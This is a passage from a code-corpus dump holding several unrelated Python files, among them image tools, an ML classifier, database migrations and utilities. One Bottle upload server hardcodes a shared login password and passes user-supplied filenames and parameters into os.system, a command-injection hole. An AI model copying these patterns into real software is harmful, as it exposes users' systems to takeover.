re.search(r\"Product Image\", colname)\n match_option = re.search(r\"Option Image\", colname)\n if match_main:\n overstock_main_image_cells.append(colname)\n elif match_option:\n overstock_option_image_cells.append(colname)\n\n \"\"\" checking if item has images:\n If item is local_manucactured and it doesn't have all color options images - item will be skipped and showed in error report. Black gold color - is optional\n Non-local-manufactured items will be moved further and only available color option images will be listed\"\"\"\n item_images = item.images\n unavailable_image_variations = []\n available_image_variations = []\n local = item.local_manufacturing\n for k, v in item_images.items():\n if len(v) == 0:\n unavailable_image_variations.append(k)\n else:\n available_image_variations.append(k)\n\n if (\n len(available_image_variations) == 1\n and local\n and available_image_variations[0]\n not in [\"black-gold\", \"sterling-silver\", \"platinum\"]\n ) or (\n local\n and len(unavailable_image_variations) > 1\n and \"black-gold\" in unavailable_image_variations\n ):\n result = \", \".join(unavailable_image_variations)\n no_image.append(f\"sku: {item.sku} - {result}\")\n else:\n successfull_items += 1\n overstock_combined_data = {}\n amazon_combined_data = {}\n \"\"\"converting class object to required data dictionary\"\"\"\n required_data = vars(item)\n stones_info = item.item_stones\n \"\"\"adding required data dictionary to static data dictionary\"\"\"\n amazon_combined_data.update(amazon_sta_data)\n amazon_combined_data.update(required_data)\n overstock_combined_data.update(overstock_sta_data)\n overstock_combined_data.update(required_data)\n amazon_item_data = subconstructor_amazon.data_generator(\n item,\n amazon_combined_data,\n amazon_colnames,\n amazon_image_cells,\n item_images,\n decoration_data,\n stones_info,\n )\n overstock_item_data = subconstructor_overstock.data_generator(\n item,\n overstock_combined_data,\n overstock_colnames,\n overstock_main_image_cells,\n overstock_option_image_cells,\n item_images,\n decoration_data,\n stones_info,\n )\n amazon_output_data.extend(amazon_item_data)\n overstock_output_data.extend(overstock_item_data)\n # category = item.subclass\n if count == items_qty:\n suffix = \"\".join(\n filename.rsplit(\"/\", 1)[-1]\n .split(\"-\")[-1]\n .split(\".\")[0]\n .split(\" \")\n )\n out_filename = f\"{ovs_folder}/{suffix}.xlsx\"\n work_with_excel.printing(\n overstock_output_data, filename, out_filename, pagename,\n )\n\n previous_filename = filename\n previous_pagename = pagename\n\n return {\n \"amazon_data\": amazon_output_data,\n \"no_images\": no_image,\n \"successfull_items_qty\": successfull_items,\n }\n","sub_path":"app/constructors/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390976995","text":"#!/usr/bin/env python3\n\n'''\nThis example shows usage of ImageWarp to crop a rotated rectangle area on a frame,\nor perform various image transforms: rotate, mirror, flip, perspective transform.\n'''\n\nimport depthai as dai\nimport cv2\nimport numpy as np\n\nkey_rotate_decr = 'z'\nkey_rotate_incr = 'x'\nkey_resize_inc = 'v'\nkey_warp_test_cycle = 'c'\n\ndef print_controls():\n print(\"=== Controls:\")\n print(key_rotate_decr, \"-rotated rectangle crop, decrease rate\")\n print(key_rotate_incr, \"-rotated rectangle crop, increase rate\")\n print(key_warp_test_cycle, \"-warp 4-point transform, cycle through modes\")\n print(key_resize_inc, \"-resize cropped region, or disable resize\")\n print(\"h -print controls (help)\")\n\nrotate_rate_max = 5.0\nrotate_rate_inc = 0.1\n\nresize_max_w = 800\nresize_max_h = 600\nresize_factor_max = 5\n\n'''\nThe crop points are specified in clockwise order,\nwith first point mapped to output top-left, as:\n P0 -> P1\n ^ v\n P3 <- P2\n'''\nP0 = [0, 0] # top-left\nP1 = [1, 0] # top-right\nP2 = [1, 1] # bottom-right\nP3 = [0, 1] # bottom-left\nwarp_test_list = [\n # points order, normalized cordinates, description\n #[[[0,0],[1,0],[1,1],[0,1]], True, \"passthrough\"],\n #[[[0,0],[639,0],[639,479],[0,479]], False, \"passthrough (pixels)\"],\n [[P0, P1, P2, P3], True, \"1.passthrough\"],\n [[P3, P0, P1, P2], True, \"2.rotate 90\"],\n [[P2, P3, P0, P1], True, \"3.rotate 180\"],\n [[P1, P2, P3, P0], True, \"4.rotate 270\"],\n [[P1, P0, P3, P2], True, \"5.horizontal mirror\"],\n [[P3, P2, P1, P0], True, \"6.vertical flip\"],\n [[[-0.1,-0.1],[1.1,-0.1],[1.1,1.1],[-0.1,1.1]], True, \"7.add black borders\"],\n [[[-0.3, 0],[1, 0],[1.3, 1],[0, 1]], True, \"8.parallelogram transform\"],\n [[[-0.2, 0],[1.8, 0],[1, 1],[0, 1]], True, \"9.trapezoid transform\"],\n]\n\npipeline = dai.Pipeline()\n\ncam = pipeline.createColorCamera()\ncam.setPreviewSize(640, 480)\ncam.setInterleaved(False)\ncam_out = pipeline.createXLinkOut()\ncam_out.setStreamName(\"preview\")\n\nmanip = pipeline.createImageManip()\nmanip.setMaxOutputFrameSize(2000*1500*3)\nmanip_out = pipeline.createXLinkOut()\nmanip_out.setStreamName(\"manip\")\nmanip_cfg = pipeline.createXLinkIn()\nmanip_cfg.setStreamName(\"manip_cfg\")\n\ncam.preview.link(cam_out.input)\ncam.preview.link(manip.inputImage)\nmanip.out.link(manip_out.input)\nmanip_cfg.out.link(manip.inputConfig)\n\nwith dai.Device(pipeline) as device:\n device.startPipeline()\n\n q_preview = device.getOutputQueue(name=\"preview\", maxSize=4)\n q_manip = device.getOutputQueue(name=\"manip\", maxSize=4)\n q_manip_cfg = device.getInputQueue(name=\"manip_cfg\")\n\n key = -1\n angle_deg = 0\n rotate_rate = 1.0\n resize_factor = 0\n resize_x = 0\n resize_y = 0\n test_four_pt = False\n warp_idx = -1\n\n print_controls()\n\n while key != ord('q'):\n if key > 0:\n if key == ord(key_rotate_decr) or key == ord(key_rotate_incr):\n if key == ord(key_rotate_decr):\n if rotate_rate > -rotate_rate_max: rotate_rate -= rotate_rate_inc\n if key == ord(key_rotate_incr):\n if rotate_rate < rotate_rate_max: rotate_rate += rotate_rate_inc\n test_four_pt = False\n print(\"Crop rotated rectangle, rate per frame: {:.1f} degrees.\"\n .format(rotate_rate))\n elif key == ord(key_resize_inc):\n resize_factor += 1\n if resize_factor > resize_factor_max:\n resize_factor = 0\n print(\"Crop region not resized\")\n else:\n resize_x = resize_max_w // resize_factor\n resize_y = resize_max_h // resize_factor\n print(\"Crop region resized to\", resize_x, 'x', resize_y)\n elif key == ord(key_warp_test_cycle):\n # Disable resizing initially\n resize_factor = 0\n warp_idx = (warp_idx + 1) % len(warp_test_list)\n test_four_pt = True\n test_description = warp_test_list[warp_idx][2]\n print(\"Warp 4-point transform:\", test_description)\n elif key == ord('h'):\n print_controls()\n\n # Send an updated config with continuous rotate, or after a key press\n if key >= 0 or (not test_four_pt and abs(rotate_rate) > 0.0001):\n cfg = dai.ImageManipConfig()\n if test_four_pt:\n test = warp_test_list[warp_idx]\n points, normalized = test[0], test[1]\n # TODO: improve this, should avoid this conversion\n point2f_list = []\n for p in points:\n pt = dai.Point2f()\n pt.x, pt.y = p[0], p[1]\n point2f_list.append(pt)\n cfg.setWarpTransformFourPoints(point2f_list, normalized)\n else:\n angle_deg += rotate_rate\n rotated_rect = ((320, 240), (400, 400), angle_deg)\n rr = dai.RotatedRect()\n rr.center.x, rr.center.y = rotated_rect[0]\n rr.size.width, rr.size.height = rotated_rect[1]\n rr.angle = rotated_rect[2]\n cfg.setCropRotatedRect(rr, False)\n if resize_factor > 0:\n cfg.setResize(resize_x, resize_y)\n #cfg.setWarpBorderFillColor(0, 0, 255)\n #cfg.setWarpBorderReplicatePixels()\n q_manip_cfg.send(cfg)\n\n for q in [q_preview, q_manip]:\n pkt = q.get()\n name = q.getName()\n shape = (3, pkt.getHeight(), pkt.getWidth())\n frame = pkt.getData().reshape(shape).transpose(1, 2, 0)\n frame = np.ascontiguousarray(frame)\n if name == \"preview\" and not test_four_pt:\n # Draw RotatedRect cropped area on input frame\n points = np.int0(cv2.boxPoints(rotated_rect))\n cv2.drawContours(frame, [points], 0, (255,0,0), 1)\n # Mark top-left corner\n cv2.circle(frame, tuple(points[1]), 10, (255,0,0), 2)\n cv2.imshow(name, frame)\n key = cv2.waitKey(1)\n","sub_path":"examples/20_color_rotate_warp.py","file_name":"20_color_rotate_warp.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"265155983","text":"import numpy as np\nfrom .base_classifier import BaseClassifier\nfrom util.string_functions import split_string_into_sentences\nfrom sklearn import svm\n# from sklearn.neighbors import KNeighborsClassifier\n# from sklearn import linear_model\nfrom .classifier_helpers import get_matches_all_sentences\n\nclass SVMRegexClassifier(BaseClassifier):\n '''\n Class specialized in classifying patient data using regexes\n '''\n def __init__(self, classifier_name, regexes, data=None, labels=None, ids=None, normalize=True):\n '''\n Initializes RegexClassifier\n\n :param classifier_name: Name of classifier\n :param regexes: List of Regex objects\n :param data: List of data\n :param labels: List of labels\n :param ids: List of ids\n '''\n super().__init__(classifier_name=classifier_name, data=data, labels=labels, ids=ids)\n self.regexes = regexes\n\n self._regex_list = []\n [self._regex_list.extend(l) for l in regexes.values()]\n\n self.normalize = normalize\n self.classifier = svm.SVC(kernel='linear', C=1, class_weight='balanced')\n\n def simple_freq_count_text(self, text, regexes, regex_to_freq_dict):\n '''\n Given a text, regexes and regex.name -> dict, it determines the amount of times regex.name appears in the text\n\n :param text: A string of text\n :param regexes: A list of regex objects\n :param regex_to_freq_dict: A string -> frequency dictionary i.e The regex's name to its count\n\n '''\n for regex in regexes:\n regex_matches = regex.determine_matches(text)\n regex_to_freq_dict[regex.name] += len(regex_matches)\n\n def freq_count_sentence(self, text, regexes, regex_to_freq_dict, freq_func=None):\n '''\n Given a text, regexes, regex.name and freq_func, it determines the amount of times regex.name appears in text\n using freq_func\n\n :param text: A string of text\n :param regexes: A list of regex objects\n :param regex_to_freq_dict: A string -> frequency dictionary i.e The regex's name to its count\n :param freq_func: function for calculating frequency\n '''\n func = self.simple_freq_count_text if freq_func is None else freq_func\n func(text, regexes, regex_to_freq_dict)\n\n def freq_count_sentences(self, text, regexes, regex_to_freq_dict, freq_func=None):\n '''\n Given a text, regexes, regex.name and freq_func, it determines the amount of times regex.name appears in text\n using freq_func\n\n :param text: A string of text\n :param regexes: A list of regex objects\n :param regex_to_freq_dict: A string -> frequency dictionary i.e The regex's name to its count\n :param freq_func: function for calculating frequency\n '''\n sentences = split_string_into_sentences(text)\n for sentence in sentences:\n self.freq_count_sentence(sentence, regexes, regex_to_freq_dict, freq_func)\n\n def calculate_frequency(self, dataset_name, normalize=True):\n '''\n Given a dataset_name, creates a frequency matrix where each row corresponds to the regex frequences for a single datapoint\n :param dataset_name: String dataset_name. (Note self.dataset[dataset_name] must be initialized first)\n :param normalize: If true, the frequencies are normalized to create a probability distribution else they are just counts\n\n :return: A nxk frequency matrix where n is the number of datapoints and k is the number of regexes\n '''\n data = self.dataset[dataset_name][\"data\"]\n labels = self.dataset[dataset_name][\"labels\"]\n ids = self.dataset[dataset_name][\"ids\"]\n\n svm_data = np.array([[]])\n\n for id, datum, label in zip(ids, data, labels):\n regexes_to_freq = {regex.name: 0 for regex in self._regex_list}\n self.freq_count_sentences(datum, self._regex_list, regexes_to_freq)\n\n total_val = 1\n\n if normalize:\n total_val = sum(regexes_to_freq.values()) if sum(regexes_to_freq.values()) > 0 else 1\n\n frequencies = np.array([[regexes_to_freq[regex.name]/total_val for regex in self._regex_list]])\n\n if svm_data.shape[1] == 0:\n svm_data = frequencies\n else:\n svm_data = np.concatenate((svm_data, frequencies), axis=0)\n\n self.dataset[dataset_name][\"regex_frequencies\"] = svm_data\n\n return svm_data\n\n def train_classifier(self, **classifier_params):\n '''\n Trains SVMRegexClassifier's classifier\n '''\n\n data = self.calculate_frequency(\"train\", normalize=self.normalize)\n x, y = data, self.dataset[\"train\"][\"labels\"]\n self.classifier.set_params(**classifier_params)\n self.classifier.fit(x, y)\n\n def run_classifier(self, sets=[\"train\", \"valid\"]):\n '''\n Runs the trained classifier on the given datasets. Note these must be loaded into self.dataset object first\n or initialized in some other manner\n\n :param sets: A list of dataset names to run the classifier on\n '''\n\n print(\"\\nRunning Classifier:\", self.name)\n\n for data_set in sets:\n print(\"Running classifier on {} with {} datapoints\".format(data_set, len(self.dataset[data_set][\"labels\"])))\n\n svm_data = self.calculate_frequency(data_set, normalize=self.normalize)\n preds = self.classifier.predict(svm_data)\n self.dataset[data_set][\"preds\"] = preds\n\n self.dataset[data_set][\"matches\"] = []\n self.dataset[data_set][\"scores\"] = []\n\n for datum in self.dataset[data_set][\"data\"]:\n class_matches = {}\n class_scores = {}\n sentences = split_string_into_sentences(datum)\n for class_name in self.regexes:\n matches = get_matches_all_sentences(sentences, self.regexes[class_name])\n\n class_scores[class_name] = None\n class_matches[class_name] = matches\n\n self.dataset[data_set][\"matches\"].append(class_matches)\n self.dataset[data_set][\"scores\"].append(class_scores)\n","sub_path":"RegexNLP-py/classifier/svm_regex_classifier.py","file_name":"svm_regex_classifier.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234576167","text":"\"\"\"empty message\n\nRevision ID: a2a8506228b6\nRevises: 2d14cbf595f1\nCreate Date: 2021-04-23 10:45:34.683207\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'a2a8506228b6'\ndown_revision = '2d14cbf595f1'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('delivery_parish',\n sa.Column('parish', sa.String(length=45), nullable=False),\n sa.Column('delivery_rate', sa.Numeric(precision=10, scale=2), nullable=False),\n sa.PrimaryKeyConstraint('parish')\n )\n op.create_table('taxes',\n sa.Column('tax', sa.String(length=50), nullable=False),\n sa.Column('rate', sa.Numeric(precision=10, scale=2), nullable=False),\n sa.PrimaryKeyConstraint('tax')\n )\n op.create_table('taxes_on_goods',\n sa.Column('tax', sa.String(), nullable=False),\n sa.Column('grocery_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['grocery_id'], ['grocery.id'], ),\n sa.ForeignKeyConstraint(['tax'], ['taxes.tax'], ),\n sa.PrimaryKeyConstraint('tax', 'grocery_id')\n )\n op.add_column('grocery', sa.Column('grams_per_unit', sa.Numeric(precision=10, scale=2), nullable=False))\n op.add_column('orders', sa.Column('deliverydate', sa.DateTime(), nullable=True))\n op.add_column('orders', sa.Column('deliveryparish', sa.String(length=45), nullable=True))\n op.add_column('orders', sa.Column('deliverytown', sa.String(length=45), nullable=True))\n op.create_foreign_key(None, 'orders', 'delivery_parish', ['deliveryparish'], ['parish'])\n op.drop_column('orders', 'deliveryparish')\n op.drop_column('orders', 'deliverydate')\n op.drop_column('orders', 'deliverytown')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('orders', sa.Column('deliverytown', sa.VARCHAR(length=45), server_default=sa.text('NULL::character varying'), autoincrement=False, nullable=True))\n op.add_column('orders', sa.Column('deliverydate', postgresql.TIMESTAMP(), autoincrement=False, nullable=True))\n op.add_column('orders', sa.Column('deliveryparish', sa.VARCHAR(length=45), server_default=sa.text('NULL::character varying'), autoincrement=False, nullable=True))\n op.drop_constraint(None, 'orders', type_='foreignkey')\n op.drop_column('orders', 'deliveryTown')\n op.drop_column('orders', 'deliveryParish')\n op.drop_column('orders', 'deliveryDate')\n op.drop_column('grocery', 'grams_per_unit')\n op.drop_table('taxes_on_goods')\n op.drop_table('taxes')\n op.drop_table('delivery_parish')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/a2a8506228b6_.py","file_name":"a2a8506228b6_.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"250855574","text":"__author__ = 'piotr.blaszczyk82@gmail.com'\nimport unittest\n\n\nclass TestRandomGenerator(unittest.TestCase):\n def test_init_2(self):\n \"\"\"\n Test form checking constructor parameters, unequal lists length\n \"\"\"\n # Given...\n from shortening.service.models import db, User, Logs, Shortening\n from peewee import IntegrityError\n\n db.connect()\n if not User.table_exists():\n User.create_table()\n if not Logs.table_exists():\n Logs.create_table()\n if not Shortening.table_exists():\n Shortening.create_table()\n\n User.proxy = 1\n\n try:\n u = User(login='user1', password='pass1')\n u.save()\n except IntegrityError:\n print(\"User already exists\")\n\n users = User.select()\n for user in users:\n print('> %s' % (str(user),))\n\n db.close()\n # When, Then...\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/unit/test_db_proxy.py","file_name":"test_db_proxy.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618379423","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2018 Kyoto University (Hirofumi Inaguma)\n# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)\n\n\"\"\"Utility functions.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\n\n\ndef tensor2np(x):\n \"\"\"Convert tensor to np.ndarray.\n\n Args:\n x (FloatTensor):\n Returns:\n np.ndarray\n\n \"\"\"\n return x.cpu().numpy()\n\n\ndef np2tensor(array, device_id=-1):\n \"\"\"Convert form np.ndarray to Variable.\n\n Args:\n array (np.ndarray): A tensor of any sizes\n device_id (int): ht index of the device\n Returns:\n var (Tensor):\n\n \"\"\"\n # assert isinstance(array, np.ndarray)\n # var = torch.from_numpy(array).pin_memory())\n var = torch.from_numpy(array)\n if device_id < 0:\n return var\n # return var.cuda(device_id, async=True)\n return var.cuda(device_id)\n\n\ndef pad_list(xs, pad_value=0.0, pad_left=False):\n \"\"\"Convert list of Tensors to a single Tensor with padding.\n\n Args:\n xs (list): A list of length `[B]`, which concains Tensors of size `[T, input_size]`\n pad_value (float):\n pad_left (bool):\n Returns:\n xs_pad (FloatTensor): `[B, T, input_size]`\n\n \"\"\"\n bs = len(xs)\n max_time = max(x.size(0) for x in xs)\n xs_pad = xs[0].new_zeros(bs, max_time, * xs[0].size()[1:]).fill_(pad_value)\n for b in range(bs):\n if len(xs[b]) == 0:\n continue\n\n if pad_left:\n xs_pad[b, -xs[b].size(0):] = xs[b]\n else:\n xs_pad[b, :xs[b].size(0)] = xs[b]\n return xs_pad\n\n\ndef compute_accuracy(logits, ys_ref, pad):\n \"\"\"Compute accuracy.\n Args:\n logits (FloatTensor): `[B, T, vocab]`\n ys_ref (LongTensor): `[B, T]`\n pad (int): index for padding\n Returns:\n acc (float): teacher-forcing accuracy\n \"\"\"\n pad_pred = logits.view(ys_ref.size(0), ys_ref.size(1), logits.size(-1)).argmax(2)\n mask = ys_ref != pad\n numerator = torch.sum(pad_pred.masked_select(mask) == ys_ref.masked_select(mask))\n denominator = torch.sum(mask)\n acc = float(numerator) * 100 / float(denominator)\n return acc\n\n\ndef to_onehot(ys, vocab, ylens=None):\n \"\"\"\n Args:\n ys (LongTensor): Indices of labels. `[B, L]`\n ylens (list): A list of length `[B]`\n Returns:\n\n \"\"\"\n bs, max_ylen = ys.size()[:2]\n\n ys_onehot = torch.zeros_like(ys).expand(ys.size(0), ys.size(1), vocab)\n for b in range(bs):\n if ylens is None:\n for t in range(max_ylen):\n ys_onehot[b, t, ys[b, t]] = 1\n else:\n for t in range(ylens[b]):\n ys_onehot[b, t, ys[b, t]] = 1\n return ys_onehot\n","sub_path":"neural_sp/models/torch_utils.py","file_name":"torch_utils.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"34793279","text":"import os, socket, bottle\nfrom bottle import route, request, static_file, run\nfrom beaker.middleware import SessionMiddleware\nsession_opts = {\n'session.type': 'file',\n'session.cookie_expires': 300,\n'session.data_dir': './data',\n'session.auto': True\n}\n\napp = SessionMiddleware(bottle.app(), session_opts)\n\n\n@route('/')\ndef root():\n return static_file('test.html', root='.')\n \n@route('/login', method='POST')\ndef do_login():\n \n account = request.params.get('account')\n password = request.params.get('password')\n print (account)\n if account in ('admin','upfly','ivy','kuo','dale','sam','tim','huang','hao') and password == '70808' :\n print (\"login ok\")\n return '1'\n return '0'\n\n\n@route('/upload', method='POST')\ndef do_upload():\n global globvarName\n global save_imgpath\n save_path = 'UserData_upload/'\n save_imgpath = save_path\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n upload = request.files.get('Accelerometer')\n template = request.params.get('TemplateIndex')\n exe_str = 'SignalAnalysis.exe \"'+save_path+str(upload.filename)+\"\\\" \"+template\n ##exe_str = '\"C:\\Users\\\\70808\\Documents\\Visual Studio 2013\\Projects\\SignalAnalysis\\SignalAnalysis\\SignalAnalysis.exe\" '+str(upload.filename)+\" \"+template\n ##exe_str = '\"C:\\Users\\70808\\Desktop\\SignalAnalysis\\SignalAnalysis.exe\" '+str(upload.filename)+\" \"+template\n ##exe_str ='''D:\\SignalAnalysis.exe '''+'RecordByadminAt16_36_57.csv'+ ' '+ template\n print (exe_str)\n name, ext = os.path.splitext(upload.filename)\n \n globvarName = name\n if ext not in ('.csv'):\n return \"File extension not allowed.\"\n \n ##save_path = \"C:\\Users\\\\70808\\Documents\\Visual Studio 2013\\Projects\\SignalAnalysis\\SignalAnalysis\"\n\n file_path = \"{path}/{file}\".format(path=save_path, file=upload.filename)\n upload.save(file_path)\n result = os.system(exe_str)\n print (result)\n return str(result)\n #return \"File successfully saved to '{0}'.\".format(save_path)\n\n \n@route('/image', method='GET')\ndef do_returnImage():\n ##img_file = \"{filename}.{type}\".format(filename=globvarName, type=\"png\")\n print (globvarName)\n return static_file(save_imgpath+globvarName + '.png', root='.')\n\n","sub_path":"DTW_WSGI.py","file_name":"DTW_WSGI.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"322255344","text":"import sqlite3\nimport random\n\n\nDB_PATH = 'db.sqlite3'\n\n\ndef init():\n connection = sqlite3.connect(DB_PATH)\n cursor = connection.cursor()\n\n cursor.executescript(open('shema.sql', 'r').read())\n connection.commit()\n connection.close()\n\n\ncountries = [\n \"Russia\",\n \"England\",\n \"Italy\",\n \"Germany\",\n \"Spain\",\n \"Portugal\",\n \"Denmark\",\n \"Iceland\",\n \"Mexico\"\n]\n\ncities = {\n \"Russia\": [\"Moscow\", \"SP\", \"Krasnodar\"],\n \"England\": [\"London\", \"Manchester\"],\n \"Italy\": [\"Rome\", \"Milan\"],\n \"Germany\": [\"Berlin\", \"Frankfurt\"],\n \"Spain\": [\"Barcelona\", \"Madrid\"],\n \"Portugal\": [\"Lisbon\"],\n \"Denmark\": [\"Copenhagen\"],\n \"Iceland\": [\"Reykjavik\"],\n \"Mexico\": [\"Mexico\"]\n}\n\n\ndef next_match():\n if True:\n team1 = random.choice(countries)\n while True:\n team2 = random.choice(countries)\n if team1 != team2:\n break\n country = random.choice(countries)\n city = random.choice(cities[country])\n score1 = random.randint(0, 5)\n score2 = random.randint(0, 5)\n return team1, team2, country, city, score1, score2\n\n\ndef make_data():\n connection = sqlite3.connect(DB_PATH)\n c = connection.cursor()\n for i in range(1000):\n match = next_match()\n cmd = f\"\"\"\n INSERT INTO matches VALUES(\n {i},\n \"{match[0]}\",\n \"{match[1]}\",\n \"{match[2]}\",\n \"{match[3]}\",\n \"{match[4]}\",\n \"{match[5]}\"\n );\n \"\"\"\n c.execute(cmd)\n connection.commit()\n connection.close()\n\n\ndef check_table():\n connection = sqlite3.connect(DB_PATH)\n c = connection.cursor()\n cmd = \"SELECT * FROM matches\"\n c.execute(cmd)\n r = c.fetchall()\n for i in r:\n print(i)\n\n connection.close()\n\n\nif __name__ == \"__main__\":\n init()\n make_data()\n check_table()\n","sub_path":"Projects/FlaskREST/Day1/db_init.py","file_name":"db_init.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"506213977","text":"import os\nfrom PIL import Image\n\n\n# directory = r\"C:\\Users\\MrD\\Desktop\\Şehit Fatih Gökkaya TOVAK\"\ndirectory = input(\"Klasör yolu giriniz:\\n\")\nnew_directory = os.path.join(directory,\"resized\")\nfiles = os.listdir(directory)\nif not os.path.exists(new_directory):\n os.mkdir(new_directory)\n\nimg_no = 1\nfor file in files:\n f_name, e = os.path.splitext(file)\n new_name = \"new_\" + f_name + \".jpg\"\n try:\n f_path = os.path.join(directory,file)\n fn_path = os.path.join(new_directory,new_name)\n im = Image.open(f_path)\n width = im.size[0]\n height = im.size[1]\n\n if width > height:\n n_width = int(float(width)*(80000/width)/100)\n n_height = int(float(height)*(60000/height)/100)\n else:\n n_width = int(float(height)*(60000/height)/100)\n n_height = int(float(width)*(80000/width)/100)\n\n # print(n_width,n_height)\n img = im.resize((n_width,n_height),resample=0) \n img.save(fn_path)\n print(img_no, \"dosya başarıyla yeniden boyutlandırıldı.\")\n img_no+=1\n except IOError:\n if os.path.isfile(f_path):\n print(\"File cannot be saved.\",)","sub_path":"PillowTutorial/tut4_resize.py","file_name":"tut4_resize.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"151995814","text":"#!/usr/bin/python3.5\n# Downloads links in the 'links' file. Updates the links file so that\n# completed links are removed from the file and places completed links\n# in a seperate file just in case they are needed again.\n\n# IMPORTS\nimport os\nimport time\nimport argparse\n\n# ARGUMENT PARSER\nparser = argparse.ArgumentParser(\n\tdescription=\"A tool to download several HTTP links provided in a file.\")\nparser.add_argument(\n\t\"-s\",\n\t\"--shutdown\",\n\thelp=\"Shut the system down after downloading has completed. (use sudo)\",\n\taction=\"store_true\")\nparser.add_argument(\n\t\"-f\",\n\t\"--file\",\n\thelp=\"-The links file to work with. Leave blank to use default (.links)\",\n\tnargs=\"?\",\n\tdefault=\".links\")\nargs = parser.parse_args()\nlinksList = args.file\nshutAfter = args.shutdown\n\n\n# GLOBAL VARIABLES\nlinksFile = \"\"\nlinks = []\ncompletedLinks = []\n\n# READ THE LINKS FILE\ndef readLinks():\n\tglobal linksList\n\tlinksFile = open(linksList, \"r\")\n\tfor line in linksFile:\n\t\tlinks.append(line.rstrip(\"\\n\"))\n\tlinksFile.close()\n\n# UPDATE THE LINKS FILE\ndef writeLinks():\n\tglobal linksList\n\tlinksFile = open(linksList, \"w+\")\n\tfor link in links:\n\t\tlinksFile.write(\"{}\\n\".format(link))\n\tlinksFile.close()\n\n# WRITE LINKS TO THE COMPLETED LINKS FILE\ndef writeComplete(curLink):\n\tcompleteFile = open(\".complete\", \"a\")\n\tcompleteFile.write(\"{}\\n\".format(curLink))\n\tcompleteFile.close()\n\n# WRITE MESSAGES TO THE LOG FILE\ndef writeLog(logMsg):\n\tlocalTime = time.asctime(time.localtime(time.time()))\n\tmsg = \"[{}] {}\\n\".format(localTime, logMsg)\n\tlogFile = open(\".log\", \"a\")\n\tlogFile.write(msg)\n\tlogFile.close()\n\n# THE MAIN FUNCTION OF THE PROGRAM\ndef downloadLinks():\n\treadLinks()\n\tfileNum = 0\n\tfor i in range(0, len(links)):\n\t\twriteLog(\"Starting link: {}\".format(links[fileNum]))\n\t\tosres = os.system(\"aria2c --load-cookies=.cookie -x 5 -s 5 -k 50M -c {}\".format(links[fileNum]))\n#\t\tosres = os.system(\"aria2c -x 5 -s 5 -k 20M -c --http-user=EMAILADDRESSHERE --http-passwd=PASSWORD {}\".format(links[fileNum]))\n\t\tif osres == 0:\n\t\t\twriteLog(\"Completed link: {}\".format(links[fileNum]))\n\t\t\twriteComplete(links[fileNum])\n\t\t\tlinks.pop(fileNum)\n\t\t\twriteLinks()\n\t\telse:\n\t\t\twriteLog(\"Error, returned {}\".format(osres))\n\t\t\twriteLog(\"Error downloading {}\".format(links[fileNum]))\n\t\t\tfileNum += 1\n\n# Start the main function of the program\ndownloadLinks()\n\n# Shutdown the system when complete\nif shutAfter: \n\tos.system(\"shutdown -h\")\n","sub_path":"downloadLinks.py","file_name":"downloadLinks.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"202016303","text":"import pytorch_lightning as pl\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom pl_bolts.datamodules import DummyDetectionDataset\nfrom pl_bolts.models.detection import FasterRCNN\n\n\ndef _collate_fn(batch):\n return tuple(zip(*batch))\n\n\ndef test_fasterrcnn(tmpdir):\n\n model = FasterRCNN()\n\n image = torch.rand(1, 3, 400, 400)\n model(image)\n\n\ndef test_fasterrcnn_train(tmpdir):\n\n model = FasterRCNN()\n\n train_dl = DataLoader(DummyDetectionDataset(), collate_fn=_collate_fn)\n valid_dl = DataLoader(DummyDetectionDataset(), collate_fn=_collate_fn)\n\n trainer = pl.Trainer(fast_dev_run=True, default_root_dir=tmpdir)\n trainer.fit(model, train_dl, valid_dl)\n","sub_path":"tests/models/test_detection.py","file_name":"test_detection.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"407176410","text":"\"\"\"\nFunctions:\n\n- my_error(status=404 ,description=\"\"):\n- get_in_stock_products()\n\n\n- validate_model_id(input_id,model_query,model_name_string)\n- validate_string(input_string,max_length,string_name)\n- validate_boolean(input_boolean,input_name_string)\n- validate_integer(input_integer,input_name_string,maximum,minimum)\n- validate_float(input_float,input_name_string,maximum,minimum)\n\n\n\n- db_drop_and_create_all()\n- populate_tables()\n\n\n\n\n- 